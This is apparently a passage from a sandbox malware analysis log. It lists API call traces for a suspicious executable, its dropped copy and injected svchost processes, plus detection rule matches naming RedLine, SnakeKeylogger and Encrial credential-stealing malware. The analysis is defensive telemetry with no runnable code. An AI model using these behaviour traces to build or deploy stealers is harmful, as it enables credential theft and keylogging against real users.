                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_00E4F1D7
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFB11F NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,0_2_00DFB11F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F2D0 SendMessageW,NtdllDialogWndProc_W,0_2_00E4F2D0
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFB385 GetParent,NtdllDialogWndProc_W,0_2_00DFB385
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_00E4F351
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F5DA NtdllDialogWndProc_W,0_2_00E4F5DA
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F5AB NtdllDialogWndProc_W,0_2_00E4F5AB
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFB55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00DFB55D
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F689 ClientToScreen,NtdllDialogWndProc_W,0_2_00E4F689
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F654 NtdllDialogWndProc_W,0_2_00E4F654
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F609 NtdllDialogWndProc_W,0_2_00E4F609
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00E4F7FF
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F7C3 GetWindowLongW,NtdllDialogWndProc_W,0_2_00E4F7C3
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFB715 NtdllDialogWndProc_W,0_2_00DFB715
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D23742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,2_2_00D23742
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D900AF NtdllDialogWndProc_W,2_2_00D900AF
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D90133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,2_2_00D90133
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D9044C NtdllDialogWndProc_W,2_2_00D9044C
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8E9AF NtdllDialogWndProc_W,CallWindowProcW,2_2_00D8E9AF
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3AAFC NtdllDialogWndProc_W,2_2_00D3AAFC
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3AB4F NtdllDialogWndProc_W,2_2_00D3AB4F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,2_2_00D8ECD4
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8EC7C NtdllDialogWndProc_W,2_2_00D8EC7C
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,2_2_00D8EEEB
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,2_2_00D8F1D7
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3B11F NtdllDialogWndProc_W,745AC8D0,NtdllDialogWndProc_W,2_2_00D3B11F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F2D0 SendMessageW,NtdllDialogWndProc_W,2_2_00D8F2D0
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3B385 GetParent,NtdllDialogWndProc_W,2_2_00D3B385
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,2_2_00D8F351
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F5DA NtdllDialogWndProc_W,2_2_00D8F5DA
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F5AB NtdllDialogWndProc_W,2_2_00D8F5AB
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3B55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,2_2_00D3B55D
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F689 ClientToScreen,NtdllDialogWndProc_W,2_2_00D8F689
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F654 NtdllDialogWndProc_W,2_2_00D8F654
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F609 NtdllDialogWndProc_W,2_2_00D8F609
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F7C3 GetWindowLongW,NtdllDialogWndProc_W,2_2_00D8F7C3
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F7FF NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00D8F7FF
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3B715 NtdllDialogWndProc_W,2_2_00D3B715
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E26685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00E26685
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74745590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_00E1ACC5
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E279D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00E279D3
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D679D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,2_2_00D679D3
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E0B0430_2_00E0B043
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DF32000_2_00DF3200
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DF3B700_2_00DF3B70
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1410F0_2_00E1410F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E002A40_2_00E002A4
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DEE3B00_2_00DEE3B0
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1038E0_2_00E1038E
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E006D90_2_00E006D9
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1467F0_2_00E1467F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4AACE0_2_00E4AACE
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E14BEF0_2_00E14BEF
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E0CCC10_2_00E0CCC1
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DEAF500_2_00DEAF50
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE6F070_2_00DE6F07
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E431BC0_2_00E431BC
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E0D1B90_2_00E0D1B9
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFB11F0_2_00DFB11F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E1724D0_2_00E1724D
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E0123A0_2_00E0123A
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E213CA0_2_00E213CA
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE93F00_2_00DE93F0
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFF5630_2_00DFF563
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE96C00_2_00DE96C0
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E2B6CC0_2_00E2B6CC
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E4F7FF0_2_00E4F7FF
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE77B00_2_00DE77B0
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E179C90_2_00E179C9
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFFA570_2_00DFFA57
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE9B600_2_00DE9B60
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE7D190_2_00DE7D19
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E09ED00_2_00E09ED0
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFFE6F0_2_00DFFE6F
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DE7FA30_2_00DE7FA3
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_010BB8C00_2_010BB8C0
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D4B0432_2_00D4B043
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D332002_2_00D33200
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D5410F2_2_00D5410F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D402A42_2_00D402A4
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D5038E2_2_00D5038E
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D2E3B02_2_00D2E3B0
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D406D92_2_00D406D9
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D5467F2_2_00D5467F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8AACE2_2_00D8AACE
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D54BEF2_2_00D54BEF
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D4CCC12_2_00D4CCC1
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D2AF502_2_00D2AF50
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D26F072_2_00D26F07
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D831BC2_2_00D831BC
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D4D1B92_2_00D4D1B9
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3B11F2_2_00D3B11F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D5724D2_2_00D5724D
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D4123A2_2_00D4123A
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D613CA2_2_00D613CA
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D293F02_2_00D293F0
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3F5632_2_00D3F563
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D296C02_2_00D296C0
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D6B6CC2_2_00D6B6CC
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D8F7FF2_2_00D8F7FF
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D277B02_2_00D277B0
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D579C92_2_00D579C9
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3FA572_2_00D3FA57
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D33B702_2_00D33B70
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D29B602_2_00D29B60
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D27D192_2_00D27D19
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D49ED02_2_00D49ED0
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3FE6F2_2_00D3FE6F
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D27FA32_2_00D27FA3
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_0133C8882_2_0133C888
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00408C603_2_00408C60
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040DC113_2_0040DC11
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00407C3F3_2_00407C3F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00418CCC3_2_00418CCC
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00406CA03_2_00406CA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004028B03_2_004028B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0041A4BE3_2_0041A4BE
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004182443_2_00418244
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004016503_2_00401650
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402F203_2_00402F20
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004193C43_2_004193C4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004187883_2_00418788
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402F893_2_00402F89
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00402B903_2_00402B90
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004073A03_2_004073A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FD7B83_2_077FD7B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077F76303_2_077F7630
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FA5983_2_077FA598
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FD4EA3_2_077FD4EA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FC4E03_2_077FC4E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FD20A3_2_077FD20A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FCF303_2_077FCF30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077F2EF83_2_077F2EF8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FEEE03_2_077FEEE0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077F6EA83_2_077F6EA8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FCC583_2_077FCC58
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FC9803_2_077FC980
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077F586F3_2_077F586F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FC6A83_2_077FC6A8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077F43113_2_077F4311
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FEED03_2_077FEED0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_077FFBA83_2_077FFBA8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A50483_2_081A5048
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A9C483_2_081A9C48
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A95783_2_081A9578
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AE2883_2_081AE288
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A00063_2_081A0006
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AF8343_2_081AF834
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A50433_2_081A5043
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A00403_2_081A0040
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AF8403_2_081AF840
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AFC983_2_081AFC98
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081ACCD03_2_081ACCD0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081ACCC03_2_081ACCC0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AD1193_2_081AD119
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AD1283_2_081AD128
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A257B3_2_081A257B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AD5703_2_081AD570
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A25803_2_081A2580
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AD5803_2_081AD580
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AD9D83_2_081AD9D8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AD9C83_2_081AD9C8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081ADE1F3_2_081ADE1F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081ADE303_2_081ADE30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AE27D3_2_081AE27D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A1E983_2_081A1E98
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A1E8B3_2_081A1E8B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AE6D03_2_081AE6D0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AE6E03_2_081AE6E0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AEB383_2_081AEB38
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A0B303_2_081A0B30
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AEB293_2_081AEB29
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A0B203_2_081A0B20
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A93583_2_081A9358
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A179F3_2_081A179F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AEF903_2_081AEF90
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AEF803_2_081AEF80
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A17B03_2_081A17B0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A8BB13_2_081A8BB1
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AF3D73_2_081AF3D7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081A8BC03_2_081A8BC0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_081AF3E83_2_081AF3E8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0040E1D8 appears 44 times
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: String function: 00D3EC2F appears 68 times
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: String function: 00D46AC0 appears 42 times
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: String function: 00D4F8A0 appears 35 times
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: String function: 00E0F8A0 appears 35 times
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: String function: 00E06AC0 appears 42 times
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: String function: 00DFEC2F appears 68 times
                  Source: B7N48hmO78.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.3.svchost.exe.305df20.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 6.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.3.svchost.exe.305ef20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 3.2.svchost.exe.7970f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
